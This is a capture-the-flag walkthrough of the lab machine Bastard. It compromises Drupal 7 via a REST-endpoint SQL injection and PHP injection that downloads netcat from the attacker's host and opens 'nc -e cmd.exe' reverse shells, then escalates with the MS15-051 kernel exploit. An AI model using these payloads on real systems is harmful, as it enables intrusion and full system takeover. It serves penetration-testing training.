We pick Bastard from the list:

Foothold

We start with a usual nmap scan:

nmap -sV -T3 -A -p- 10.10.10.9

While it runs we can try the popular ports by hand. Open a web browser and go to http://10.10.10.9. We see a Drupal website with the default theme.

bastard-drupal

Our scan finishes:

Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-18 18:03 EDT
Nmap scan report for 10.10.10.9
Host is up (0.12s latency).
Not shown: 65532 filtered ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   127.79 ms 10.10.14.1
2   128.56 ms 10.10.10.9

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 392.23 seconds

So we know it is Drupal 7 running on Microsoft IIS 7.5. IIS 7.5 only ships with Windows 7 and Windows Server 2008 R2, which matches nmap's OS guesses, and the 65532 filtered ports mean a host firewall is dropping everything except 80, 135 and 49154.

We can also run a nikto web scan against it to see whether any misconfigured or default pages are exposed.

nikto -h http://10.10.10.9
bastard-nikto

Checking a few of the pages from the results, we can see that the default installation text files are left public, such as http://10.10.10.9/INSTALL.mysql.txt:

bastard-mysql

The robots.txt file is also exposed; the paths it disallows tell us roughly how the site is laid out:

bastard-robots

Once the nikto scan finishes we can run a directory brute-force in case anything else is hosted on the web server:

dirb http://10.10.10.9 -i

While the web scan is running we can search for known exploits and vulnerabilities against Drupal 7 with searchsploit.

bastard-search
searchsploit -x 34992

From the list we can see there are a few SQL injection (SQLi) exploits. The Add Admin User one (EDB-ID 34992, the Drupageddon bug, CVE-2014-3704) sounds promising. Examining the Python script, it sets a browser User-Agent, crafts the injection payload and sends it in a POST request, inserting a new user with a pre-hashed password directly into the database.

bastard-sqli

User

We can copy it over:

cp /usr/share/exploitdb/exploits/php/webapps/34992.py drupal-create-admin.py

Then run the script:

python drupal-create-admin.py -t http://10.10.10.9 -u admin -p admin
bastard-fail

The script reports failure. That could be genuine or a false negative: Drupageddon was fixed in Drupal 7.32, so a patched site is simply not vulnerable, or the script may just not handle this target. Since we have other exploits to try, we skip the remaining SQLi entries and go to the next one on the list, which may give us a reverse shell.
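Before firing a version-specific exploit it is worth reading the version the site itself advertises. The following is an added example, not code from the original writeup: it parses the first line of the CHANGELOG.txt that robots.txt listed (Drupal 7 writes it as "Drupal 7.54, 2017-02-01") and decides whether CVE-2014-3704 can apply. The changelog text embedded below is constructed for the demo; fetch the real one from http://10.10.10.9/CHANGELOG.txt.

```python
"""Check a Drupal 7 site's version before firing Drupageddon (EDB-ID 34992).

Added example, not part of the original writeup. Drupageddon
(SA-CORE-2014-005 / CVE-2014-3704) was fixed in Drupal 7.32, so anything at
or above that version will make the 34992 script fail for a real reason.
"""
import re
from typing import Optional, Tuple

DRUPAGEDDON_FIXED_IN = (7, 32)

# Constructed sample of what /CHANGELOG.txt returns on a Drupal 7 site
# (newest release first, "Drupal <major>.<minor>, <date>" as the header line).
SAMPLE_CHANGELOG = """Drupal 7.54, 2017-02-01
-----------------------
- Modules are now able to define theme engines.

Drupal 7.53, 2016-12-07
-----------------------
- Fixed drag and drop support on newer Chrome/Safari versions.
"""

VERSION_RE = re.compile(r"^Drupal\s+(\d+)\.(\d+),\s*\d{4}-\d{2}-\d{2}", re.M)


def drupal_version_from_changelog(text: str) -> Optional[Tuple[int, int]]:
    """Return the newest version in a Drupal 7 CHANGELOG.txt as (major, minor).

    The newest release is the first entry in the file, so the first match
    wins. Returns None when the text is not a Drupal changelog (404 page,
    Drupal 8 layout, file removed by the admin).
    """
    m = VERSION_RE.search(text)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2))


def vulnerable_to_drupageddon(version: Tuple[int, int]) -> bool:
    """True for Drupal 7.0 through 7.31; 7.32 and later carry the fix."""
    return version[0] == 7 and version < DRUPAGEDDON_FIXED_IN


def assess(text: str) -> str:
    """Human-readable verdict for a fetched CHANGELOG.txt body."""
    version = drupal_version_from_changelog(text)
    if version is None:
        return "unknown: CHANGELOG.txt missing or not in Drupal 7 format"
    label = f"{version[0]}.{version[1]}"
    if vulnerable_to_drupageddon(version):
        return f"Drupal {label}: vulnerable to CVE-2014-3704, 34992 should work"
    return f"Drupal {label}: patched against CVE-2014-3704, expect 34992 to fail"


if __name__ == "__main__":
    print(assess(SAMPLE_CHANGELOG))
```

Run it against the body of `curl -s http://10.10.10.9/CHANGELOG.txt`; if the file has been removed, the version is still often visible in the first line of INSTALL.txt or in the `Drupal 7 (http://drupal.org)` generator header, though those do not give the minor number.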

searchsploit -x 41564

Okay... well, never mind. This one also relies on SQL injection. But it works against any Drupal 7 site that has the Services module's REST endpoint enabled, and it performs the injection through that REST endpoint rather than the login form, so we'll try it. Let's make a copy:

cp /usr/share/exploitdb/exploits/php/webapps/41564.php drupal-7-sqli.php

Then let’s edit it:

vi drupal-7-sqli.php

Already we notice some formatting issues: one of the comments wraps onto a new line at line 16 of the script:

bastard-format-error

And line 71:

bastard-format-error

After we clean that up we fix a few variables to point at our target. As you can see, by default they point to the script author's own test site:

bastard-default-vars

Since Drupal is running at the root of the remote web server we can change the $url variable to just http://10.10.10.9.

As for $endpoint_path, we can check whether that path actually exists on the target:

http://10.10.10.9/rest_endpoint
bastard-page-not-found

Back at our dirb scan we can see it found /rest:

bastard-dirb-rest

Okay great.

I took some time to see what data was being generated and what the SQLi query looks like. In the code I added some var_dumps and echoed a few variables, then did a few test runs.

bastard-headers-var
bastard-data-var

We can now update $endpoint_path to /rest, then save and exit with :wq.

Before running this script we can install php-curl if we don’t have it already:

apt -y install php-curl

Then run the file:

php -f drupal-7-sqli.php

This will generate two files: user.json:

bastard-user

And session.json:

bastard-session

Now that we have a valid admin session (the cookie name and session ID written to session.json), we can present it as a cookie and authenticate ourselves as the admin user without ever knowing the password.

There are browser extensions we can use to set cookies on a site. For my initial test I used Burp Suite to add the cookie to the request:

bastard-burp

When we load the main page now, we can see it authenticates us:

bastard-admin-login
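Setting the cookie by hand is where this step usually goes wrong, so here is an added example (not from the original writeup or the 41564 exploit) that builds the Cookie header from the dumped session and cross-checks the cookie name against the host we attacked. It assumes session.json carries the keys "session_name" and "session_id" (a hypothetical layout used for the demo). Drupal 7 derives its cookie name as SESS plus the first 32 hex characters of sha256 over the base URL without the scheme (SSESS for the secure cookie when the https variable is set, and $cookie_domain from settings.php replaces the host if configured), which is what the check reproduces. The session.json content below is constructed.

```python
"""Turn a dumped Drupal 7 session into a Cookie header and sanity-check it.

Added example, not part of the original writeup. The session.json layout
(keys "session_name" and "session_id") is an assumption for this demo.
"""
import hashlib
import json
from typing import Dict


def drupal7_session_cookie_name(base_url: str, secure: bool = False) -> str:
    """Reproduce Drupal 7's session_name() for a site at base_url.

    Drupal drops the scheme and hashes what is left ("10.10.10.9" or
    "example.com/drupal"), so HTTP and HTTPS share one cookie name; the
    secure-only cookie used when the https variable is on is prefixed SSESS.
    Sites that set $cookie_domain in settings.php hash that value instead.
    """
    _, _, host_and_path = base_url.partition("://")
    host_and_path = host_and_path.rstrip("/")
    prefix = "SSESS" if secure else "SESS"
    return prefix + hashlib.sha256(host_and_path.encode()).hexdigest()[:32]


def load_session(text: str) -> Dict[str, str]:
    """Parse session.json as written by the exploit (assumed key names)."""
    data = json.loads(text)
    missing = {"session_name", "session_id"} - data.keys()
    if missing:
        raise ValueError(f"session.json lacks {sorted(missing)}")
    return data


def cookie_header_from_session(session: Dict[str, str]) -> str:
    """Cookie header value to paste into Burp or pass to curl -b."""
    return f"{session['session_name']}={session['session_id']}"


def session_matches_target(session: Dict[str, str], base_url: str) -> bool:
    """Does the dumped cookie name belong to the site we think we attacked?

    A mismatch usually means the site lives under a sub-path, answers to a
    different hostname, or the dump came from another install entirely.
    """
    return session["session_name"] in (
        drupal7_session_cookie_name(base_url),
        drupal7_session_cookie_name(base_url, secure=True),
    )


# Constructed session.json for the demo; the sid is a placeholder, not a real one.
SAMPLE_SESSION_JSON = json.dumps({
    "session_name": drupal7_session_cookie_name("http://10.10.10.9"),
    "session_id": "c0nstructedSidXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
})

if __name__ == "__main__":
    sess = load_session(SAMPLE_SESSION_JSON)
    print("Cookie:", cookie_header_from_session(sess))
    print("matches http://10.10.10.9:", session_matches_target(sess, "http://10.10.10.9"))
```

With the header in hand, `curl -s -b "$COOKIE" http://10.10.10.9/user` should return the admin's account page rather than the login form; if it does not, compare the name against `session_matches_target` before assuming the session was invalidated.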

What we would like to do next is find a way to inject our own php code and setup a reverse shell.

Looking at the documentation, Drupal 7 core ships with a module called PHP Filter that lets page content be evaluated as PHP: https://www.drupal.org/docs/7/howtos/add-php-code-to-the-body-of-a-drupal-7-block.

At the admin tool menu, click Modules.

In the module list, find PHP Filter, tick its checkbox and click Save configuration at the bottom of the page.

Once saved, we can create a test page with some php code:

  • click on Content
  • click Add Content
  • choose Basic page
  • enter a title in Title
  • enter some test code, such as <?php phpinfo(); ?> for Body
  • select PHP code for Text format
  • click Save
bastard-test-php

Once saved, on the Content list, click on the new page title.

bastard-test-page

As we can see the php code does load:

bastard-php-inject

Great.

The web server is running Windows, so we will host a web server locally and have the remote system download a Windows netcat binary, which we can then use for a reverse shell.

First we look for a Windows nc.exe file on our machine:

locate nc.exe

And copy it:

cp /usr/share/windows-resources/binaries/nc.exe .

Let’s do another php test to see what the server’s working directory is. Back at the test page Body, we can enter a Command Prompt command:

<?php
echo exec('cd');
?>

Then save and navigate to the test page again. This gives us the web server's working directory, a location we know exists; the download test in the next step confirms the IIS worker account can also write to it.

bastard-php-dir

Then setup our web server:

python -m SimpleHTTPServer 9999

And setup our code on the page that will download the nc.exe and show contents in the directory to prove it downloaded.

<?php

// Pull nc.exe from our SimpleHTTPServer. file_put_contents accepts the
// stream returned by fopen, so this writes the binary into the web root.
$url = "http://10.10.XX.XX:9999/nc.exe";
file_put_contents("nc.exe", fopen("$url", 'r'));

// List the working directory so the page itself shows whether nc.exe landed.
exec('dir', $output);
foreach ($output as $outputs) {
    echo "$outputs\n";
}
?>

Save the page, then reload the view page. In our SimpleHTTPServer log we can see the download take place.

bastard-proof-download

When the page loads, we can see the directory contents and see that nc.exe is there.

bastard-proof-nc

We can edit the test page again – this time setting up a netcat reverse shell.

<?php
exec('C:\inetpub\drupal-7.54\nc.exe -e cmd.exe 10.10.XX.XX 444');
?>

Save the page. Before viewing (and thereby executing) it, set up a listener on our local machine. Note that exec() blocks until nc.exe exits, so the browser request will hang for as long as the shell is alive:

nc -lvp 444

We refresh the test page and get a connection.

bastard-nc-connect

We can go straight for the user flag. Browsing C:\Users we find a user, dimitris.

cd C:\Users\dimitris\Desktop\
type user.txt
bastard-user-flag

Privilege Escalation

Now we can begin some system enumeration for privilege escalation starting with systeminfo:

bastard-systeminfo

No hotfixes are listed, so we can assume the OS has never been patched since installation.

On our Local machine we can copy and paste the systeminfo output into a file.

vi bastard-systeminfo.txt

Enter insert mode pressing i. Paste the output in and save and exit with ESC:wq.

With this we can use Windows Exploit Suggester (https://github.com/AonCyberLabs/Windows-Exploit-Suggester), which compares the installed hotfixes against Microsoft's bulletin database to list the patches, and therefore the public exploits, this machine may be missing.

wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/master/windows-exploit-suggester.py

Get the database:

wget http://download.microsoft.com/download/6/7/3/673E4349-1CA5-40B9-8879-095C72D5B49D/BulletinSearch.xlsx

Download the requirements (the script is Python 2 and needs xlrd to read the spreadsheet):

apt -y install python-xlrd

Run the comparison:

python windows-exploit-suggester.py --systeminfo bastard-systeminfo.txt --database BulletinSearch.xlsx
bastard-windows-list

We can look up the ones on the list.

After doing some checking, testing and reading of the scripts, I decided to move on before going too deep into a rabbit hole. A lot were incompatible, requiring SP1 or the wrong architecture.
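Most of the dead ends above come down to three fields in systeminfo: service pack, architecture and the installed KB list. As an added example (not from the writeup or from Windows Exploit Suggester), the following parses that output and filters a candidate table by those prerequisites, so the SP1-only and 32-bit entries drop out before anything is uploaded. The systeminfo text is constructed in the layout the command prints (not the box's real output), and the candidate table is constructed too: KB3045171 is the MS15-051 fix named in the zip used below, while the SP1-only entry and its KB number are hypothetical placeholders.

```python
"""Parse `systeminfo` output and filter kernel exploits by their prerequisites.

Added example, not part of the original writeup. Sample data is constructed.
"""
import re
from typing import Dict, List

# Constructed sample in systeminfo's layout (not the target's real output).
SAMPLE_SYSTEMINFO = """
Host Name:                 WEB01
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
System Type:               x64-based PC
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
"""

# Constructed candidate table: minimum service pack (None = any), target
# architecture, and the KB whose presence means the hole is closed.
CANDIDATES = [
    {"name": "MS15-051 (ms15-051x64.exe)", "service_pack": None, "arch": "x64", "kb": "KB3045171"},
    {"name": "hypothetical SP1-only exploit", "service_pack": 1, "arch": "x64", "kb": "KB0000000"},
    {"name": "MS15-051 32-bit build", "service_pack": None, "arch": "x86", "kb": "KB3045171"},
]

# Hotfix lines look like "                           [01]: KB3045171".
KB_RE = re.compile(r"\[\d+\]:\s*(KB\d+)", re.I)


def parse_systeminfo(text: str) -> Dict[str, object]:
    """Extract OS name, build, service pack, architecture and hotfixes."""
    fields = {}
    for line in text.splitlines():
        # Top-level "Key: value" rows start at column 0; continuation rows are indented.
        if ":" in line and not line.startswith(" "):
            key, _, val = line.partition(":")
            fields[key.strip()] = val.strip()

    ver = fields.get("OS Version", "")          # e.g. "6.1.7601 Service Pack 1 Build 7601"
    sp = re.search(r"Service Pack (\d+)", ver)
    build = re.search(r"Build (\d+)", ver)
    arch = "x64" if "x64" in fields.get("System Type", "") else "x86"

    return {
        "os_name": fields.get("OS Name", ""),
        "build": int(build.group(1)) if build else None,
        "service_pack": int(sp.group(1)) if sp else 0,   # "N/A" means no SP
        "arch": arch,
        "hotfixes": KB_RE.findall(text),                  # [] when systeminfo prints "N/A"
    }


def usable_exploits(info: Dict[str, object], candidates=CANDIDATES) -> List[str]:
    """Keep candidates whose SP and arch fit and whose fixing KB is absent."""
    installed = {kb.upper() for kb in info["hotfixes"]}
    usable = []
    for c in candidates:
        if c["arch"] != info["arch"]:
            continue
        if c["service_pack"] is not None and info["service_pack"] < c["service_pack"]:
            continue
        if c["kb"].upper() in installed:
            continue
        usable.append(c["name"])
    return usable


if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(info)
    print("candidates that fit:", usable_exploits(info))
```

Feed it the real output saved in bastard-systeminfo.txt; the KB check matters most, since a host that shows "N/A" for hotfixes is exactly the case where every kernel exploit for its build remains on the table.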

We can turn to searchsploit for some Windows Local Privilege Escalation:

searchsploit Windows Local Privilege Escalation

These ones here we have done on Optimum:

bastard-lpe-2

There’s a few more generic ones:

bastard-lpe

When searching some of them I found that some were risky in terms of reliability:

bastard-bsod

We can look up another one:

searchsploit -x 37049

It is a text file that points to an already compiled .exe hosted in hfiref0x's CVE-2015-1701 repository on GitHub:

wget https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe

I will say, I first copied this file over and ran it and nothing fired. I tried both copies from that link and the same thing happened: nothing. My guess was that it was no longer vulnerable or was being blocked by AV.

I was close to going back to enumerate some more when I found another source. We download the zip, extract it and move the 64-bit version into our working directory on the local machine:

wget https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS15-051/MS15-051-KB3045171.zip

unzip MS15-051-KB3045171.zip

cp MS15-051-KB3045171/Source/ms15-051/x64/ms15-051x64.exe .

We can re-use our test page to copy the file over:

<?php

$url = "http://10.10.XX.XX:9999/ms15-051x64.exe";
file_put_contents("ms15-051x64.exe", fopen("$url", 'r'));

exec('nc.exe -e cmd.exe 10.10.XX.XX 4444');

?>

When we refresh the page we confirm the transfer in our SimpleHTTPServer log and with a dir from our listener connection.

We can then run the executable:

bastard-ms15-051

Great. It works and prints its usage. Whatever command we pass as the argument is run with elevated privileges: MS15-051 is a win32k.sys kernel bug (CVE-2015-1701), so the spawned process runs as SYSTEM rather than as the IIS worker account.

We can test it, then use it to spawn another netcat connection to a new listener.

On our Local machine:

nc -lvp 1234

And on our Remote shell:

ms15-051x64.exe "nc.exe -e cmd.exe 10.10.XX.XX 1234"

Then once connected we can get the root flag:

bastard-root-flag